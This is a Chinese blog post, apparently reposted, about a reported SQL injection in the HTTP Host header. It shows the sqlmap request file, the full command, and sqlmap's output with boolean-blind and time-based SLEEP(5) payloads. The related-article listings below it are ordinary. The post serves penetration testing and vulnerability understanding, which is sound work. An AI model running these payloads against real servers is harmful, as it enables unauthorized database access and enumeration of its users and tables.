对 HTTP 请求的 Host 参数进行 SQL 注入

最新推荐文章于 2024-05-27 23:13:14 发布
最新推荐文章于 2024-05-27 23:13:14 发布
阅读量515 收藏 1
点赞数
文章标签: 数据库 操作系统
原文链接:https://segmentfault.com/a/1190000012904313
版权

最近收到了一个漏洞通报,居然是对 HTTP 请求的 Host 参数进行 SQL 注入,比较有趣,需要总结一下。

如下是经过简化的具体的渗透测试命令,假设主机名为 aaa.bbb.ccc:

$ more sql.txt   
GET / HTTP/1.1
Host: aaa.bbb.ccc*

$ sqlmap --host http://aaa.bbb.ccc -r sql.txt --random-agent -p Host --risk 3 --dbms mysql  --current-user --is-dba —tables
...
sqlmap identified the following injection point(s) with a total of 306 HTTP(s) requests:
---
Parameter: Host #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -6117') OR 9754=9754 AND ('EXWO'='EXWO

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: aaa.bbb.ccc') OR SLEEP(5) AND ('UnAw'='UnAw
---
...

渗透过程中 sqlmap 会生成类似如下的 HTTP 请求,以进行 SQL 注入测试,通过 -v3 参数可以看到:

GET / HTTP/1.1
Host: aaa.bbb.ccc') OR SLEEP(5) AND ('hxje'='hxje
Referer: http://aaa.bbb.ccc:80/
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Firefox/2.0.0.8
Connection: close

正常情况下,使用 --level 3 参数时 sqlmap 会测试一些 HTTP 请求头的参数,但不会测试 Host 参数,所以需要使用 -p Host 参数来指定测试。

此外由于 Host 参数与伪静态页面类似,所以还需要用 * 星号标记一下注入点。

weixin_34037977
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Http请求头中的Host参数与nginx的server_name的关系
IT_Most的博客
12-28 2545
host请求参数与nginx的请求匹配详解~
HttpHost远程访问获取参数方式
心的宁静专栏
02-26 3914
1.直接传递json方式 System.out.println(HttpUtil.executePostParamJson(url, compressStr)); 获取方式为 Message message = PhaseInterceptorChain.getCurrentMessage(); HttpServletRequest request = (HttpServletReques
HTTP 请求行、Host字段信息版本总结
weixin_30448685的博客
05-07 406
最近查了一些请求行URI和Host字段的资料。 HTTP请求请求行包括   方法(METHOD)   请求URI(Request-URI)   协议版本(HTTP-Version) 其中请求URI在HTTP1.1中被命名为请求目标(request-target)。似乎是因为HTTP1.1协议新增方法请求的对象不仅限于URI了,为了方便讨论,下面我们将请求行第二项均称为请求URI。 请...
Host头攻击
最新发布
wfdfg的博客
05-27 2416
(也被称为HTTP Host注入攻击)是一种Web安全漏洞,攻击者通过篡改HTTP请求中的Host头部字段来执行恶意操作。在HTTP协议中,Host头部字段用于指定请求所针对的域名,以便服务器能够正确地将请求路由到相应的Web应用程序。
通过 HTTP进行 SQL 注入(转)
听雨轩
12-11 634
  在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的,以及讨论下选择哪种漏洞扫描器测试SQL注入。 作者:Yasser Aboukir, InfoSec Institute 在 漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。有时,当做web应用程序测试时,SQL注入漏洞的测试用例通常局限于特殊...
There is no getter for property named 'XXX' in class 'aaa.bbb.ccc'(终极骚操作的解决方法)...
weixin_30872789的博客
10-30 169
  使用SpringBoot整合Mybatis时,遇到了像标题的异常,博主当时是用Bean类对象作为参数的,所以百度了很久都没有建设性答案。贴一下报错的xxxDao文件和xxxMapper.xml文件: package com.cjs.dao; import com.cjs.bean.User; import org.apache.ibatis.annotations.Mapper;...
PHP中Http协议post请求参数
12-19
在PHP中,HTTP协议的POST请求参数主要用于向服务器发送数据,这种请求方式通常用于提交表单数据、上传文件等场景,因为POST请求可以承载大量数据且数据不会显示在URL上,提高了数据的安全性。了解HTTP协议是理解PHP...
SQL注入思路详解
12-14
以下是对SQL注入思路的详细解析: 1. **识别Web应用与数据库交互的可能输入点**: - GET请求参数:URL中的参数通常会被用于构建SQL查询,是注入的常见入口。 - POST请求参数:在表单提交中,这些参数可能直接进入...
Delphi通过http访问sqlserver2000数据库
08-10
确保所有敏感信息如数据库连接字符串和用户凭证得到妥善保护,避免SQL注入攻击。同时,良好的错误处理机制可以提高程序的健壮性。 总的来说,通过HTTP访问SQL Server 2000数据库提供了一种远程操作数据库的方式,但...
SQLMAP参数介绍.pdf
09-25
- **URL分析**:SQLMAP会对提供的URL进行扫描,识别出可注入参数,并确定适合的SQL注入技术。 - **数据库识别**:一旦发现注入点,SQLMAP会尝试识别出正在使用的数据库类型,如MySQL、Oracle、PostgreSQL等。 -...
第四节 Sqlmap 请求参数设置2-01
09-15
注意,如果 `--level` 设置为 5,将对 HTTP 主机头进行 SQL 注入检测。 Sqlmap 设置 Referer 头 伪造 HTTP Referer 值是可能的。默认情况下,如果没有显式设置,HTTP 请求中不会发送 HTTP 引用头。请注意,如果 `-...
Sql 注入原理、应用与特征
weixin_45088761的博客
07-19 719
本文主要对sql注入的原理、应用、特征做一个总结
注入后端HTTP请求】服务器端HTTP重定向、HTTP参数注入
08-21 1365
注入后端HTTP请求】服务器端HTTP重定向、HTTP参数注入——HTTP参数污染、攻击URL转换
POST请求和GET请求如何传递和接收解析参数
码农小胖哥
10-09 1万+
1. 前言接口参数应该怎么传递是每个项目应该面对的问题,这跟编程语言无关,今天来总结一波常用的接口参数传递方式。2. GET 请求GET 请求一般用来向服务器请求获取数据。总体来说目前有...
现有一字符串"aaa[bbb[ccc,ddd[eee,fff]],ggg[hhh,iii]]"要求,取出所有类似 xxx[xxx,xxx] 结构的字符串
Endl_1998的博客
11-24 2779
// 现有一字符串: // String str = "aaa[bbb[ccc,ddd[eee,fff]],ggg[hhh,iii]]"; // 要求,取出所有类似 xxx[xxx,xxx] 结构的字符串 , // 思路:从内到外进行匹配符合条件的字符串,然后 // 把符合条件的字符串使用指定字符串(例如:000,1...
C语言将多个字符串合并为一个字符串例如:数组[a,bbb,ccc]->字符串"a,bbb,ccc"
热门推荐
忆、瞻的专栏
12-20 1万+
//将文件名列表合并为一个字符串例如:数组[a,bbb,ccc]->字符串"a,bbb,cc" char* combineFileNames(const char** fileNameList, const int count) { if (count <= 0) { return NULL; } int i, length = 0; for (i = 0; i < count; +
file_get_contents 传递 host 参数的方法
yaradish的博客
10-24 1601
在某些场景下*,我们使用 file_get_contents 时不可请求域名地址,只能直接请求其IP,但又必须传递host参数,应该怎么做呢? *例如: 源站向同一域名的CDN服务器请求刷新某内容时, 若此前源站因某些需要已在hosts中将该域名指向本地, 此时 file_get_contents 直接请求域名将连接本机而无法连接到CDN服务器。 我们可以改为请求CDN服务器的IP地址,并带上ho...
HTTPhost参数的作用
ROBIN12JBJ的博客
04-26 2081
近日发现校园官网中域名不同,而对应的ip相同,遂查阅资料,得出如下结论: 1.一个域名只对应一个ip地址,而一个ip地址可以对应多个域名。 2.不同的域名解析到相同的ip地址时,http头中host参数起重要作用,标志要访问的域名,一个服务器上有一个ip地址,可以通过访问的域名来区分不同内容。 3.互联网上,一台台服务器是通过不同的IP来进行识别的。每台服务器上可以新建很多站点,您的网站程序就放在一个站点里面,然后在这个站点上绑定您的域名。所以一台服务器可以绑定很多个域名,也就是一个IP可以对应
sql注入核心代码分析解释
05-25
为了防止SQL注入攻击,我们需要对输入参数进行过滤和转义,将特殊字符进行转义,例如: ```python import pymysql def query_user(username, password): conn = pymysql.connect(host='localhost', port=3306, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值